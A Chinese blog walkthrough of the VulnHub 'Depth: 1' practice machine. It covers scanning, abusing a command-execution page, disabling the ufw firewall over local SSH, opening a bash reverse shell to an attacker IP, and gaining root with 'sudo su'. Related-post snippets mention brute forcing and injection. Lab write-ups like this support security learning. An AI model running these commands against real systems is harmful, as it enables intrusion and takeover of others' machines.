Depth: 1靶机

最新推荐文章于 2024-11-17 21:03:02 发布
最新推荐文章于 2024-11-17 21:03:02 发布
阅读量656 收藏 6
点赞数 14
文章标签: 开源 网络安全 linux 学习方法 github
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/140964639
版权

靶机地址:Depth: 1 ~ VulnHub

查看靶机的MAC地址:

一、信息收集

扫描目标主机

arp-scan -l

使用nmap扫描靶机开放的端口

nmap -sV -p- 192.168.7.132

浏览器访问8080端口,发现这是一个tomcat网页

翻译为:

使用dirsearch扫描目录

dirsearch -u http://192.168.7.132:8080/

拼接/test.jsp

翻译为:

经提示,尝试输入ls -l /tmp,查询成功

尝试直接反弹shell,失败😭

查看家目录ls -l /home,发现bill用户

输入ps -aux查看进程,发现sshd服务正在运行,但刚才扫描端口时却只有8080端口开放,只是就会猜测,它可能被防火墙拦截了

查看/etc目录ls -l /etc/,正如所猜测的那样,存在防火墙ufw

尝试关闭防火墙

ssh bill@localhost sudo ufw disable

使用 bash 反向 shell 在端口 192.168.7.251 的端口 5555 上获得访问权限

复制生成的有效负载并使用 ssh 去执行反弹。

二、Getshell

尝试反弹shell并进行监听

nc -lnvp 5555

ssh bill@localhost bash -i >& /dev/tcp/192.168.7.251/5555 0>&1

三、权限提升

sudo -l      #查看sudo提权可用的命令

sudo su

提权成功!

成功找到flag{WellThatWasEasy}

嗷嗷~嗷嗷~
关注
pWnOS: 2.0 - linux
战神/calmness的博客
12-28 637
目录 靶机地址 信息收集 Whatweb 查是否是CMS 访问80页面 IsIntS 目录遍历 PHP信息版本 搜索漏洞利用 hydra 爆破web登录页面 尝试错误 爆破:killerbeesareflying 报错注入 输入账户密码登录blog 查看源码 注入读取文件load_file into outfile 函数 命令执行 反弹shell [一] 反弹shell [二] 提权 直接登录成功 (二)查看blog源码 MSF 登录成功 上传php-rev
【vulnhub】Depth靶机
wbplife的博客
08-02 405
输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。ls -l /home 查看到home目录内容,发现bill用户。存在系统命令执行漏洞,进行利用,反弹shell尝试失败。提示我们输入 ls -l /tmp 测试一下。,发现所有用户(ALL)都有sudo权限,运行环境:VMware运行该虚拟机。有一个目录/test.jsp。
Vulnhub靶机 Depth(渗透测试)
2301_78721909的博客
07-29 395
Vulnhub靶机 Depth(from wuhu)
【vulnhub靶场】Depth:1靶机提权
qq_46421742的博客
07-28 323
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
DepthB2R靶机渗透测试
weixin_58786230的博客
08-03 295
【代码】DepthB2R靶机渗透测试。
Vulnhub靶机Depth: 1
whoami
09-25 1003
Vulnhub靶机Depth: 1实战
Depth:1
幻影狐的博客
09-24 497
看到存在 ssh 服务并且在运行,但是刚刚并没有扫出来,可能是防火墙的原因。看到开放了一个 8080 端口,访问一下,看到是 tomcat。看到除了多开放 22 端口,还有一个 5355 端口。先访问一下 /manager/html 目录看看。查看 /home 目录底下,看到了用户 bill。使用 ps aux 查看一下靶机正在运行的进程。看到居然可以使用 ALL 所有的命令。sudo -l 查看可以使用的命令。安装好靶机,发现靶机的 ip。使用命令,尝试关闭防火墙。使用命令查找防火墙信息。
vulnhub-Depth 1靶机
wjSteve的博客
09-22 422
sh &123 2>&123',我们只需要单引号里的内容。执行后发现网页开始加载,证明命令成功执行,但是没有shell反弹出来,可能是靶机防火墙过滤了流量。sudo -l显示我们可以无密码执行任何sudo命令,所以直接 sudo su。尝试使用这个命令框反弹shell,先在kali的6789端口开启监听。导入靶机,和kali同一网段,开启靶机时就给出了IP地址。/test.jsp是一个可以执行查看目录命令的页面。拼接到ssh命令后,使用刚才获得的账户,输入。成功获得shell,开始提权。
DC-1 靶机渗透测试(拿shell,提权)
single_g_l的博客
03-17 5594
目录 一. 环境 二. 信息收集 1. 主机发现 2.访问 192.168.1.184:80 三. 利用msfconsole 攻击(拿到flag1) 1. 漏洞利用成功 2. 进入会话 ,拿到flag1.txt ---shell ​四. 找到配置文件,获取flag2 五. 修改管理员密码,登录网站,拿到flag3 1. 获取交互式shell, 执行MySQL语句 2. 查看管理员用户 3. 修改管理员密码 六. 用find语句,找到flag4 七. SUID提权,获取...
HTB靶场系列 linux靶机 Poison靶机
m0_57221101的博客
01-14 991
勘探 nmap -sCV 10.10.10.84 Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-07 19:26 EDT Nmap scan report for 10.10.10.84 Host is up (0.018s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2 (FreeBSD 2016
攻防世界misc进阶
舞动的獾
05-22 8479
004眼见非实 下载附件 打开后解压,发现了.docx文件 我尝试了改后缀,转格式,编码都失败了,最后在winhex打开,查看文件头 50 4B 03 04 发现这是一个zip文件,改后缀为.zip 直接解压,拿到了一堆.xml文件 **猜测在最外面的文件里** 但是并没有flag 还有word文件夹,首先打开,找到document.xml 在sublime下打开,find flag ...
centos7&&ubuntu搭建Vulhub靶场(推荐Ubuntu)
weixin_45694388的博客
06-11 879
这里写目录标题一.前言总结二.成功操作:三.出现报错:四.vulhub使用正文:一.前言总结二.成功操作:三.出现报错:四.vulhub使用 一.前言总结 二.成功操作: 三.出现报错: 四.vulhub使用 正文: 一.前言总结 建议直接使用Ubuntu安装,直接看第二步的操作。 Centos安装docker详细教程如下链接,:(建议python和pip环境使用3<python<=3.7版本(Centos7预装2.7),python2停止维护,pip2也不能搭建新的vulhub)建议直接使用u
wireshark实战笔记之路由跟踪(tracert)
weixin_43742894的博客
04-03 9186
接上篇文章《wireshark实战笔记的ICMP分析》 路由跟踪tracert概述路由跟踪原理(tracert)实验实验一 windows下同一个路由器下的路由跟踪(一跳)实验二 Windows下 多跳的路由跟踪如何才算到达了目的地址: 概述 路由跟踪功能用来识别一个设备到另一个设备的网络路径。在一个简单的网络上,这个网络路径可能只经过一个路由器,甚至一个路由器也不经过。但是在复杂的网络中,数据包可能会经过数十个路由器才会到达最终的目的地。对于网络通信检修来说,确定数据包从一个地方到另一个地方所走的路径是非
ReactPress与WordPress:两大开源发布平台的对比与选择
小牛itbull的博客
11-13 913
在当今数字化时代,内容管理系统(CMS)已成为各类网站和应用的核心组成部分。两款备受欢迎的开源发布平台——ReactPress和WordPress,各自拥有独特的优势和特点,吸引了众多开发者和内容创作者的关注。以下是二者的详细介绍,包括它们的网址,以帮助读者更好地了解两者之间的差异,以便做出明智的选择。
通过全球最前沿的技术解决视频拼接中时延带来的的应用缺陷,使得全景视频拼接能够真正得以大范围使用和推广的智慧地产开源了。
tt120326的博客
11-13 1494
智慧地产视觉监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。通过计算机视觉和人工智能技术 ,搭建智能钢丝绳检测系统、井筒检测分析系统、余煤检测分析系统,提高检测准确度 ,降低工人在线的劳动强度 ,有效提高检测标准、避免客制化生产下 ,人工有可能存在的工作疏漏。
Ollama—87.4k star 的开源大模型服务框架!!
一名很普通的互联网打工人
11-13 579
Ollama 是一个开源的大语言模型(LLM)服务工具,它允许用户在本地环境快速实验、管理和部署大型语言模型。它支持多种流行的开源大型语言模型,如 Llama 3.1、Phi 3、Mistral、Gemma 2 等,并且可以通过命令行界面轻松下载、运行和管理这些模型。Ollama 的出现是为了降低使用大型语言模型的门槛,是让大型语言模型更加普及和易于访问。Ollama 是一个功能强大且易于使用的工具,它为本地部署和运行大型语言模型提供了一个简单而有效的方法
嵌入式开发人员如何选择合适的开源前端框架进行Web开发
最新发布
Psyduck_ing的博客
11-17 539
在嵌入式系统的Web开发中,选择合适的开源前端框架至关重要。本文将介绍几款流行的开源前端框架,并分析它们的特点和适用场景,帮助嵌入式开发人员做出明智的选择。
开源模型应用落地-qwen模型小试-Qwen2.5-7B-Instruct-tool usage入门-并行调用多个tools(五)
没有卑微的工作,只有卑微的心态,与其抱怨,不如埋头实干
11-14 1274
在Qwen-Agent中并行调用多个tools
开源免费】基于SpringBoot+Vue.JS高校学科竞赛平台(JAVA毕业设计)
customer08的博客
11-14 1420
本高校学科竞赛平台有管理员,学生,领队老师,教师,管理员功能有个人中心,教师管理,学生管理,领队教师管理,竞赛类型管理,竞赛信息管理,学院管理,专业管理,获奖情况管理,系统管理等。
网络安全实战:Pikachu靶机Zip包解析
1. 靶机包概述: 在网络安全领域,靶机(target machine)是指专门设置用于模拟攻击目标的计算机系统或网络设备,它允许安全研究人员、黑客爱好者以及相关专业人士在受控环境下进行渗透测试、漏洞挖掘和安全漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值